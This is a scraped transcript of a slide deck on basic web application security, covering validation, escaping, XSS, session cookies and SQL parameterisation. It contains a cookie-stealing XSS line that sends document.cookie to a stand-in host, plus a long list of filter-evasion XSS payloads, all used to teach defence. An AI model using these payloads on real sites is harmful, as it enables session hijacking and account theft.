basic web application security n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
Basic Web Application Security PowerPoint Presentation
Download Presentation
Basic Web Application Security

Loading in 2 Seconds...

play fullscreen
1 / 76

Basic Web Application Security - PowerPoint PPT Presentation


  • 96 Views
  • Uploaded on

Basic Web Application Security. User Input. Kick Your Arse. Three Ways. (All Awesome). Validation. Passive. (No touchy-touchy). This is a Number. 2. This is not a Number. a. This is really not a Number. <script>alert(‘ loldongs ’)</script>. Filtering. Destructive. (One-Way Street).

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Basic Web Application Security' - ella


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
three ways

Three Ways

(All Awesome)

passive

Passive

(No touchy-touchy)

this is really not a number
This is really not a Number.

<script>alert(‘loldongs’)</script>

destructive

Destructive

(One-Way Street)

white listing usability problems

What happens when

you screw it up?

White-Listing  Usability Problems

Black-Listing  Security Problems

(Always a trade-off.)

transport

Transport

Point A  Point B

slide24
HTML

<b>Huh.</b>

<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>

<b>Huh</b>

slide25
SQL

Sam O’Brien

INSERT INTO mah_peeps (name)

VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00

slide26

XSS

(Cross-Site Scripting)

slide27

SS

(XTREME Site Scripting)

sticking scripts where they don t belong

Sticking Scripts Where They Don’t Belong.

You there, down the back.

Stop sniggering.

slide31

<script>document.write(‘<img src=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oh shit.

slide35

<script>document.write(‘<imgsrc=“http://badguys.net/logthis.php?d=‘+document.cookie+’” style=“display:none;”>’);</script>

Oooooooooooooooooh shit.

why is this really uncool

Why is this really uncool?

(Because shut up.)

slide37

HTTP

Hyper-Text Thingy I-forgot-again

it can guess badly

It can guess.(Badly.)

IP Address

Browser User-Agent

sends a cookie with each request

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every request.)

the server puts a unique id in the basket

The Server puts a unique ID in the basket.

PHPSESSID=123your456mum789

__utma=12948.23.4211414.5553

is_a_furry=1

browser sends the id every request

Browser sends the ID every request.

PHPSESSID=123your456mum789

they have your cookie

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-

slide47
HTML

Validation Really Hard.

slide48
HTML

Filtering Still Really Hard.

  • Use a library, eg. HTML Purifier.
slide49
HTML

Escaping Dead Easy.

Most languages have stuff to handle this, eg.

htmlentities(), cgi.escape(), CGI.escape()

how hard is filtering

How hard is filtering?

(It’s just <script>, right?)

this hard
THIS HARD.

<IMG SRC=javascript:alert('a')>

<imgsrc=javascript:alert(&quot;a&quot;)>

<img “””><script>alert('a')</script>”>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;

&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;

&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72

&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72

&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascript:alert('a');“>

<IMG SRC="jav&#x09;as&#x09cript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<SCR\0IPT>alert('a')</SCR\0IPT>

<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>

<imgonmouseover!#$%&=alert('a')>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<script src=//foo/x.js>

<imgsrc=”javascript:alert('a')”

(Well, then.)

this hard1
THIS HARD.

<iframesrc=http://foo/x.html <

<body background=”javascript:alert('a')”>

<BODY ONLOAD=alert('a')>

<imgdynsrc=”javascript:alert('a')”>

<imglowsrc=”javascript:alert('a')”>

<BGSOUND SRC=javascript:alert('a')>

<BR SIZE=”&{alert('a')}”>

<LAYER SRC=”http://foo/x.html”></LAYER>

<link rel=”stylesheet” href=”javascript:alert('a');”>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>BODY{-moz-binding:url("http://foo/x.xml#xss")}</STYLE>

<IMG SRC='vbscript:msgbox(“a”)'>

<imgsrc=”livescript:alert('a')”>

žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)

<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert('a');”>

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

(Well, then.)

this hard2
THIS HARD.

<DIV STYLE="background-image: url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a

\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061

\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('a'))">

<DIV STYLE="width: expression(alert('a'));">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>

<BASE HREF="javascript:alert('a');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg=="

type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

(Well, then.)

that injected code can trigger forms run javascript functions or make ajax calls

That injected code can trigger forms, run javascript functions, or make AJAX calls.

(... Oooooh.)

send someone to a link that looks like http my site user script dostuff script

Send someone to a link that looks like:http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)

or store something that will output this on someone s profile page script dostuff script

Or store something that will output this on someone’s profile page:<script>doStuff();</script>

(... Oooooooooooooooh.)

the human element

The Human Element

Touchy-Feely Commie Bullshit.

slide69
SQL

Insert(“INSERT INTO

posts VALUES (‘”.sql_safe($title).”’, ‘“.sql_safe($content).”’, ‘”.sql_safe($author).”’)”);

slide70
SQL

or

slide71
SQL

insert(“INSERT INTO

posts VALUES

(:title, :content, :author)”,

$title, $content, $author);

slide72
HTML

<h3><%= title %> - <%= date %><h3>

<div><%= raw(post_body) %></div>

<p>Written by <%= author %></p>

slide74
HTML

<h3><?=htmlentities($title);?> - <?=htmlentities(date);?><h3>

<div><?=$post_body;?></div>

<p>Written by <?=htmlentities($author);?></p>